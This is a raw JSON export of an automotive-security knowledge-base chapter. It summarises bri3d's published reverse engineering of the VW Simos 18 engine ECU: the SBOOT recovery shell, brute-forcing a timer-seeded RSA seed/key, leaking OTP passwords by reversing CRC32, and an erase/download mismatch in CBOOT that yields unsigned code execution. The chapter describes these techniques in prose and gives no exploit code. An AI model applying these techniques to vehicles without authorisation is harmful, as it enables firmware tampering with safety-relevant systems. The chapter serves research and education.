[{"data":1,"prerenderedAt":325},["Reactive",2],{"kb-chapters":3,"kb-doc:/knowledge-base/existing-research/engine-control-units/":169},[4,11,17,23,29,35,41,47,53,59,65,71,77,83,89,96,102,108,114,120,126,132,138,144,151,157,163],{"_path":5,"title":6,"description":7,"part":8,"_file":9,"chapterNumber":10},"/knowledge-base/networks/introduction","Introduction","Overview of the communication networks used in modern vehicles, from LIN to Automotive Ethernet.","Vehicle Networks & Protocols","7.knowledge-base/1.networks/1.introduction.md",1,{"_path":12,"title":13,"description":14,"part":8,"_file":15,"chapterNumber":16},"/knowledge-base/networks/vehicle-documentation","Vehicle Documentation","Where to find manufacturer wiring diagrams, J2534 passthrough devices, and the different types of diagrams that are useful when researching a vehicle.","7.knowledge-base/1.networks/2.vehicle-documentation.md",2,{"_path":18,"title":19,"description":20,"part":8,"_file":21,"chapterNumber":22},"/knowledge-base/networks/lin-bus","Local Interconnect Network (LIN)","Local Interconnect Network — a single-wire low-speed bus used as a low-cost alternative to CAN for non-critical body electronics.","7.knowledge-base/1.networks/3.lin-bus.md",3,{"_path":24,"title":25,"description":26,"part":8,"_file":27,"chapterNumber":28},"/knowledge-base/networks/controller-area-network","Controller Area Network (CAN)","ISO 11898 — the differential bus that became the backbone of automotive networking. Frames, bit timing, errors, CAN FD, message contents, and practical attacks.","7.knowledge-base/1.networks/4.controller-area-network.md",4,{"_path":30,"title":31,"description":32,"part":8,"_file":33,"chapterNumber":34},"/knowledge-base/networks/secure-onboard-communication","Secure Onboard Communication (SecOC)","AUTOSAR's standard for cryptographic message authentication on in-vehicle networks — freshness values, MAC computation and key management.","7.knowledge-base/1.networks/5.secure-onboard-communication.md",5,{"_path":36,"title":37,"description":38,"part":8,"_file":39,"chapterNumber":40},"/knowledge-base/networks/flexray","FlexRay","Time-triggered, deterministic automotive bus standardized as ISO 17458, designed for higher speeds and drive-by-wire systems.","7.knowledge-base/1.networks/6.flexray.md",6,{"_path":42,"title":43,"description":44,"part":8,"_file":45,"chapterNumber":46},"/knowledge-base/networks/automotive-ethernet","Automotive Ethernet","Automotive variants of Ethernet — 100BASE-T1, 1000BASE-T1, and 10BASE-T1S — built around single twisted-pair cabling and strict EMC requirements.","7.knowledge-base/1.networks/7.automotive-ethernet.md",7,{"_path":48,"title":6,"description":49,"part":50,"_file":51,"chapterNumber":52},"/knowledge-base/diagnostics/introduction","Overview of automotive diagnostic protocols — ISO-TP, OBD-II, UDS, CCP and XCP — and how they layer on top of CAN.","Diagnostic Protocols","7.knowledge-base/2.diagnostics/1.introduction.md",8,{"_path":54,"title":55,"description":56,"part":50,"_file":57,"chapterNumber":58},"/knowledge-base/diagnostics/iso-tp","ISO 15765-2 (ISO-TP)","ISO 15765-2 transport layer for sending diagnostic payloads larger than 8 bytes over CAN — single, first, consecutive and flow-control frames.","7.knowledge-base/2.diagnostics/2.iso-tp.md",9,{"_path":60,"title":61,"description":62,"part":50,"_file":63,"chapterNumber":64},"/knowledge-base/diagnostics/vw-tp20","VW Transport Protocol 2.0 (TP 2.0)","Volkswagen's pre-ISO-TP transport layer for KWP2000 over CAN — channel setup, parameter negotiation, and the data exchange counter scheme.","7.knowledge-base/2.diagnostics/3.vw-tp20.md",10,{"_path":66,"title":67,"description":68,"part":50,"_file":69,"chapterNumber":70},"/knowledge-base/diagnostics/obd-ii","On-board diagnostics (OBD-II)","On-Board Diagnostics II — the J1962 connector, signal protocols, service IDs, parameter IDs, and DTC encoding.","7.knowledge-base/2.diagnostics/4.obd-ii.md",11,{"_path":72,"title":73,"description":74,"part":50,"_file":75,"chapterNumber":76},"/knowledge-base/diagnostics/uds","Unified Diagnostic Services (UDS)","ISO 14229-1 — the modern diagnostic protocol for sessions, Read/Write DID, Security Access, Routine Control and firmware Request Download / Upload.","7.knowledge-base/2.diagnostics/6.uds.md",12,{"_path":78,"title":79,"description":80,"part":50,"_file":81,"chapterNumber":82},"/knowledge-base/diagnostics/ccp","CAN Calibration Protocol (CCP)","A low-level debug/calibration protocol over CAN — Command Receive Object, Data Transfer Object, and the commands used to read and write ECU memory.","7.knowledge-base/2.diagnostics/7.ccp.md",13,{"_path":84,"title":85,"description":86,"part":50,"_file":87,"chapterNumber":88},"/knowledge-base/diagnostics/xcp","Universal Measurement and Calibration Protocol (XCP)","ASAM XCP — successor to CCP supporting CAN, CAN FD, FlexRay, and Ethernet, with synchronous data acquisition, stimulation, and calibration.","7.knowledge-base/2.diagnostics/8.xcp.md",14,{"_path":90,"title":91,"description":92,"part":93,"_file":94,"chapterNumber":95},"/knowledge-base/reverse-engineering/ecu-flashing","ECU Flashing","How a control unit is reprogrammed over the wire with UDS, walked through step by step, why the sequence is staged the way it is, and how the SecurityAccess seed/key gate works, from weak proprietary LFSR ciphers to the Volkswagen SA2 script.","Reverse Engineering","7.knowledge-base/3.reverse-engineering/1.ecu-flashing.md",15,{"_path":97,"title":98,"description":99,"part":93,"_file":100,"chapterNumber":101},"/knowledge-base/reverse-engineering/oem-update-files","OEM Update Files","Where to find official ECU firmware, why OEMs ship it, and how the major manufacturer update container formats (VW FRF/ODX, Toyota CUW, Ford VBF, BMW psdzdata, Tesla BHX) are structured, decrypted, and unpacked.","7.knowledge-base/3.reverse-engineering/2.oem-update-files.md",16,{"_path":103,"title":6,"description":104,"part":105,"_file":106,"chapterNumber":107},"/knowledge-base/existing-research/introduction","Landmark papers from 2010 to 2016 that defined automotive security research and demonstrated the first complete remote exploit chain against a production vehicle.","Existing Research","7.knowledge-base/4.existing-research/1.introduction.md",17,{"_path":109,"title":110,"description":111,"part":105,"_file":112,"chapterNumber":113},"/knowledge-base/existing-research/engine-control-units","Engine Control Units","Public reverse-engineering work on engine ECUs, focusing on bri3d's documented exploit chains for the Volkswagen Group Simos 18 ECU and its Infineon TriCore TC1791 processor.","7.knowledge-base/4.existing-research/2.engine-control-units.md",18,{"_path":115,"title":116,"description":117,"part":105,"_file":118,"chapterNumber":119},"/knowledge-base/existing-research/ev-charging","EV Charging","Research covering two distinct attack surfaces introduced by electric vehicle charging, the HomePlug Green PHY powerline data layer used by the Combined Charging System, and the AC charger as a peer device with its own firmware and bidirectional communications.","7.knowledge-base/4.existing-research/3.ev-charging.md",19,{"_path":121,"title":122,"description":123,"part":105,"_file":124,"chapterNumber":125},"/knowledge-base/existing-research/fault-injection","Fault Injection","Published fault injection research relevant to automotive microcontrollers, covering voltage glitching, EMFI, debug access, and secure-boot bypasses on Renesas, Infineon, NXP/Freescale, and Tesla compute platforms.","7.knowledge-base/4.existing-research/4.fault-injection.md",20,{"_path":127,"title":128,"description":129,"part":105,"_file":130,"chapterNumber":131},"/knowledge-base/existing-research/infotainment-telematics","Infotainment & Telematics","Sixteen published research entries covering remote exploitation of infotainment and telematics systems across Tesla, BMW, Mercedes-Benz, Volkswagen Group, and Nissan vehicles, plus a cross-industry web API survey.","7.knowledge-base/4.existing-research/5.infotainment-telematics.md",21,{"_path":133,"title":134,"description":135,"part":105,"_file":136,"chapterNumber":137},"/knowledge-base/existing-research/sensors-and-radios","Other Wireless Attack Surfaces","Research covering wireless attack surfaces beyond the primary CAN and telematics interfaces, including tire pressure sensors and DAB radio receivers, both of which accept untrusted RF input and have historically performed no authentication or input validation.","7.knowledge-base/4.existing-research/6.sensors-and-radios.md",22,{"_path":139,"title":140,"description":141,"part":105,"_file":142,"chapterNumber":143},"/knowledge-base/existing-research/remote-keyless-entry","Remote Keyless Entry and Immobilisers","Research on cryptographic attacks against passive keyless entry systems, transponder-based immobilisers, rolling-code RKE, and the CAN-injection theft chain.","7.knowledge-base/4.existing-research/7.remote-keyless-entry.md",23,{"_path":145,"title":146,"description":147,"part":148,"_file":149,"chapterNumber":150},"/knowledge-base/tools/can-adapters","CAN Adapters","USB-to-CAN adapters — comma.ai red panda and PEAK-System PCAN — and the standard DB-9 pinout for CAN.","Tools","7.knowledge-base/5.tools/1.can-adapters.md",24,{"_path":152,"title":153,"description":154,"part":148,"_file":155,"chapterNumber":156},"/knowledge-base/tools/can-analysis","CAN Analysis","Tools for analysing and reverse-engineering CAN traffic — comma.ai cabana, SavyCAN, VehicleSpy, and Wireshark.","7.knowledge-base/5.tools/2.can-analysis.md",25,{"_path":158,"title":159,"description":160,"part":148,"_file":161,"chapterNumber":162},"/knowledge-base/tools/scripting","Scripting","Python libraries and CLI tools for talking to a CAN bus — comma.ai panda, SocketCAN can-utils, python-can, and Scapy with ISO-TP and UDS examples.","7.knowledge-base/5.tools/3.scripting.md",26,{"_path":164,"title":165,"description":166,"part":148,"_file":167,"chapterNumber":168},"/knowledge-base/tools/dbc-files","DBC Files","The DBC file format used to describe the contents of CAN messages — nodes, messages, signals, comments, and value tables.","7.knowledge-base/5.tools/4.dbc-files.md",27,{"_path":109,"_dir":170,"_draft":171,"_partial":171,"_locale":172,"title":110,"description":111,"part":105,"references":173,"body":184,"_type":321,"_id":322,"_source":323,"_file":112,"_extension":324},"existing-research",false,"",[174,180],{"id":175,"authors":176,"title":177,"year":178,"url":179},"bri3d-sboot","Brian Ledbetter (bri3d)","Simos18_SBOOT: Simos 18 Supplier Bootloader documentation and exploit",2020,"https://github.com/bri3d/Simos18_SBOOT",{"id":181,"authors":176,"title":182,"year":178,"url":183},"bri3d-vwflash","VW_Flash documentation: Simos 18 CBOOT analysis and flashing tools","https://github.com/bri3d/VW_Flash/blob/master/docs/docs.md",{"type":185,"children":186,"toc":314},"root",[187,195,201,208,215,230,235,240,245,250,259,265,276,289,294,299,304,310],{"type":188,"tag":189,"props":190,"children":192},"element","h1",{"id":191},"engine-control-units",[193],{"type":194,"value":110},"text",{"type":188,"tag":196,"props":197,"children":198},"p",{},[199],{"type":194,"value":200},"Engine ECUs are the target of an active reverse-engineering community, driven by the aftermarket tuning scene and interest in the trust chains that protect factory firmware. The Simos 18, built around the Infineon TriCore TC1791, is the most thoroughly documented case in public research.",{"type":188,"tag":202,"props":203,"children":205},"h2",{"id":204},"simos-18",[206],{"type":194,"value":207},"Simos 18",{"type":188,"tag":209,"props":210,"children":212},"h3",{"id":211},"simos-18-sboot",[213],{"type":194,"value":214},"Simos 18 SBOOT",{"type":188,"tag":196,"props":216,"children":217},{},[218,224,226],{"type":188,"tag":219,"props":220,"children":221},"em",{},[222],{"type":194,"value":223},"Bri3d (Brian Ledbetter), GitHub 2020+",{"type":194,"value":225}," ",{"type":188,"tag":227,"props":228,"children":229},"citation",{"id":175},[],{"type":188,"tag":196,"props":231,"children":232},{},[233],{"type":194,"value":234},"The Simos 18 ECU runs on the Infineon TC1791S. Its flash is internal to the processor and protected by passwords burned into a One Time Programmed (OTP) region during manufacturing, so reading flash requires an exploit rather than a direct hardware access.",{"type":188,"tag":196,"props":236,"children":237},{},[238],{"type":194,"value":239},"The supplier bootloader (SBOOT) occupies the lowest 0x14000 bytes of program flash, checks CBOOT validity flags during startup, and promotes verified CBOOT updates when present. It also exposes a recovery shell, entered by applying two phase-shifted 3.2 kHz PWM signals to two harness pins at boot; the TriCore GPTA peripheral checks the phase offset and, if correct, opens a command shell over ISO-TP on CAN.",{"type":188,"tag":196,"props":241,"children":242},{},[243],{"type":194,"value":244},"The shell requires a seed/key exchange. The ECU generates 256 bytes via a Mersenne Twister PRNG, encrypts them with an RSA public key, and sends the ciphertext. The intended flow requires the RSA private key. In practice the PRNG is seeded only from the system timer, making the seed space at most 2^31. With tight CAN timing the tester can predict the timer value and brute-force the window in seconds on a laptop.",{"type":188,"tag":196,"props":246,"children":247},{},[248],{"type":194,"value":249},"Once past that gate, the pre-signature CRC validator accepts a weakly bounded address header. The start-address bounds check is missing, allowing the checksum to cover the OTP region. Because CRC32 is reversible, four bytes at a time can be back-calculated from the checksum; iterating across the password area with CPU resets between steps recovers the flash-access passwords.",{"type":188,"tag":196,"props":251,"children":252},{},[253],{"type":188,"tag":254,"props":255,"children":258},"img",{"alt":256,"src":257},"Two 3.2 kHz PWM signals with a quarter-period phase offset, as required to enter the Simos 18 SBOOT recovery shell. Figure from Brian Ledbetter (bri3d), 2020 (Simos18_SBOOT).","/images/knowledge-base/existing-research/engine-control-units/bri3d-simos18-sboot-pwm-1.png",[],{"type":188,"tag":209,"props":260,"children":262},{"id":261},"simos-18-cboot-and-vw_flash",[263],{"type":194,"value":264},"Simos 18 CBOOT and VW_Flash",{"type":188,"tag":196,"props":266,"children":267},{},[268,272,273],{"type":188,"tag":219,"props":269,"children":270},{},[271],{"type":194,"value":223},{"type":194,"value":225},{"type":188,"tag":227,"props":274,"children":275},{"id":181},[],{"type":188,"tag":196,"props":277,"children":278},{},[279,281,287],{"type":194,"value":280},"CBOOT is VW's standard firmware update interface, implementing the UDS flashing sequence described in the ",{"type":188,"tag":282,"props":283,"children":284},"a",{"href":90},[285],{"type":194,"value":286},"ECU Flashing chapter",{"type":194,"value":288},": extended session, SA2 seed/key, erase, block download with Encryption A (AES-128-CBC) and Compression A (LZSS), and RSA signature verification. Each block's OK flag lives immediately after the block in flash, outside the erased range.",{"type":188,"tag":196,"props":290,"children":291},{},[292],{"type":194,"value":293},"The vulnerability is a state-machine oversight: CBOOT requires Erase before Download but does not check that the downloaded block matches the erased one. A tester can erase block N and then download into block M. Because the TriCore flash controller writes directly to program flash as chunks arrive, the data lands in M while M's OK flag remains untouched. The subsequent CRC and RSA check fails, but CBOOT still considers M valid on the next boot, yielding arbitrary code execution in a block the trust chain treats as signed.",{"type":188,"tag":196,"props":295,"children":296},{},[297],{"type":194,"value":298},"Writing into non-erased TriCore flash is constrained: bits can only flip from zero to one, and ECC codes carry the same limit. The practical method is to target runs of 0x00 bytes (NOP on TriCore) and write a jump plus a small payload into that space, keeping ECC consistent.",{"type":188,"tag":196,"props":300,"children":301},{},[302],{"type":194,"value":303},"Building on both exploit chains, bri3d released VW_Flash, an open-source Python toolkit that automates the full flashing pipeline for Simos 18 and several other VW Group ECUs, handling SA2 key computation, FRF/ODX parsing, Encryption A, Compression A, and the UDS transfer sequence.",{"type":188,"tag":202,"props":305,"children":307},{"id":306},"references",[308],{"type":194,"value":309},"References",{"type":188,"tag":311,"props":312,"children":313},"chapter-references",{},[],{"title":172,"searchDepth":16,"depth":16,"links":315},[316,320],{"id":204,"depth":16,"text":207,"children":317},[318,319],{"id":211,"depth":22,"text":214},{"id":261,"depth":22,"text":264},{"id":306,"depth":16,"text":309},"markdown","content:7.knowledge-base:4.existing-research:2.engine-control-units.md","content","md",1779543672136]